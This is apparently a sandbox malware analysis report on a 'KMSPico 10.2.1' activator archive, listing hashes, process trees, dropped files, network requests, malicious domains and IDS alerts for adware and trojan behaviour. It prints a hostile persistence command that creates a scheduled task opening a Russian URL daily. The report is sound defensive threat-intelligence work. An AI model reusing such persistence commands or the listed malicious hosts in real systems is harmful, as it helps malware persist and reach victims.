| Field | Value |
|---|---|
| File name | KMSPico 10.2.1.zip |
| Full analysis | https://app.any.run/tasks/6ec22242-8d28-4274-87f5-c984c5ec2e97 |
| Verdict | Malicious activity |
| Analysis date | January 17, 2019, 15:00:41 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | C030AB3934B0B93FA0F727AD8C93165D |
| SHA1 | 521C762FCB4150D768CF07BDDC4717A1EB304933 |
| SHA256 | E2D08D5F7AA3FD1FD6CED12E2636B095C79866386AC31109C6405951F987070A |
| SSDEEP | 98304:tXQUxzCWEKhMVIqItyU/ciah5Q27zEfv0qtvNcJN1u7:tQWEKvztyU/8k7fvL/Qk7 |

| Extension | Identified type |
|---|---|
| .zip | ZIP compressed archive (100) |

| ZIP field | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | 0x0001 |
| ZipCompression | Deflated |
| ZipModifyDate | 2018:03:15 18:28:19 |
| ZipCRC | 0x395eca2e |
| ZipCompressedSize | 359796 |
| ZipUncompressedSize | 370751 |
| ZipFileName | GNU LICENSE.pdf |

| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3100 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\KMSPico 10.2.1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
| 3228 | "C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe | — | WinRAR.exe | User: admin; Integrity Level: MEDIUM; Exit code: 3221226540 |
| 3700 | "C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe | — | WinRAR.exe | User: admin; Integrity Level: HIGH |
| 3484 | cmd /c ""C:\Program Files\KMSPico 10.2.1 Final\KMSPICO_SETUP.BAT"" | C:\Windows\system32\cmd.exe | — | KMSPico 10.2.1.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2108 | schtasks /create /tn "SVC Update" /tr "C:\Windows\explorer.exe ""http://lktoday.ru""" /sc DAILY | C:\Windows\system32\schtasks.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2756 | "KMSPicoActivator.exe" | C:\Program Files\KMSPico 10.2.1 Final\KMSPicoActivator.exe | — | cmd.exe | User: admin; Integrity Level: HIGH; Exit code: 0 |
| 3412 | "Registry_Activation_1593077924.exe" | C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe | — | cmd.exe | User: admin; Integrity Level: HIGH; Description: Lelebata Setup; Version: 2.3.1.4 |
| 3288 | "C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe" /_ShowProgress /PrTxt:TG9hZGluZy4uLg== /mnl | C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe | — | Registry_Activation_1593077924.exe | User: admin; Integrity Level: HIGH; Description: Lelebata Setup; Exit code: 259; Version: 2.3.1.4 |

| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtBMP | |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtIcon | |
| 3100 | WinRAR.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E | LanguageList | en-US |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 0 | C:\Users\admin\AppData\Local\Temp\KMSPico 10.2.1.zip |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | name | 120 |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | size | 80 |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | type | 120 |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | mtime | 100 |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface | ShowPassword | 0 |
| 3100 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3412 | Registry_Activation_1593077924.exe | C:\Users\admin\AppData\Local\Temp\00218210.log | — | — | — |
| 3100 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\GNU LICENSE.pdf | — | 00D4F618C0DE7B14A46DCB44CB51C6FA | D77838D8A443FD896BBA46B615DD954220F5AEAC5EB4EAC21B19EA42138C87BB |
| 3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\KMSPICO_SETUP.BAT | text | D60C8BD33E6CC5CB0E21326DB688D00C | 45084BE22C07EA6E8F309EBCAC99581BA3E7FEAAF36AC26959FC1405D9F4D4A9 |
| 3100 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe | executable | 79AB3CE97177023917A54B80CE4A0FA5 | D7DE94BBC77967BE9053C9481884A0A7450DF974A6A89E69726DF0A1E31FD911 |
| 3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe | executable | 89BA7CD67B24E069800F07523AF73510 | 0907412C7D0F9C9F28B031B8963BD89648701E10FCBBBC57701C1967C8B8A40A |
| 3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\activation.exe | executable | F63B568CD350D2845CA187C17801944A | 74E61E9954896AB9EEF69A9560D8A42670377AE4990163106109759161317E12 |
| 3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\KMSPicoActivator.exe | executable | CF8BCFB831E0544BA343EDDFD5E20B77 | B83F5AFECA49CE41F24282DF09DD2B2EB311D2B4474EB6C6FFE8C3DF9B0CC01F |
| 3700 | KMSPico 10.2.1.exe | C:\Users\admin\AppData\Local\Temp\gentee1A\setup_temp.gea | bs | 2215E338401449838D618C001AC495FC | 7A977C8A920A6CD4AACF7EB6B85EA9812361942330D26D9C6497A850F35F9AEC |
| 3700 | KMSPico 10.2.1.exe | C:\Users\admin\AppData\Local\Temp\gentee1A\guig.dll | executable | D3F8C0334C19198A109E44D074DAC5FD | 005C251C21D6A5BA1C3281E7B9F3B4F684D007E0C3486B34A545BB370D8420AA |
| 3412 | Registry_Activation_1593077924.exe | C:\Users\admin\AppData\Local\Temp\inH219598438225\css\main.scss | text | A85DEB7E401725C73E02464106F6501F | 3B5A044EF2BFF26A7D09AF66A3B8E102CF669BEDEEE65C127B46C4DC21EC344D |

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2756 | KMSPicoActivator.exe | GET | 200 | 13.32.222.36:80 | http://all.fingersleep.bid/offer.php?affId=1462&trackingId=356255617&instId=803&ho_trackingid=HO356255617&cc=LK&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5d979308c3b6ea5ad7e984e628c8cac1&v=3&net=4.6.01055&ie=8%2e0%2e7601%2e17514&res=1280x720&osd=469&kid=hqmrb21aga33h9lsvhd | US | — | — | whitelisted |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2756 | KMSPicoActivator.exe | 13.32.222.36:80 | all.fingersleep.bid | Amazon.com, Inc. | US | whitelisted |

| Domain | IP | Reputation |
|---|---|---|
| all.fingersleep.bid | | whitelisted |
| ww2.kalutobb-saca.com | | malicious |
| app.kalutobb-saca.com | | malicious |

PID | Process | Class | Message |
---|---|---|---|
2756 | KMSPicoActivator.exe | A Network Trojan was detected | ET MALWARE PPI User-Agent (InstallCapital) |
2756 | KMSPicoActivator.exe | Misc activity | ADWARE [PTsecurity] SoftwareBundler:Win32/Prepscram |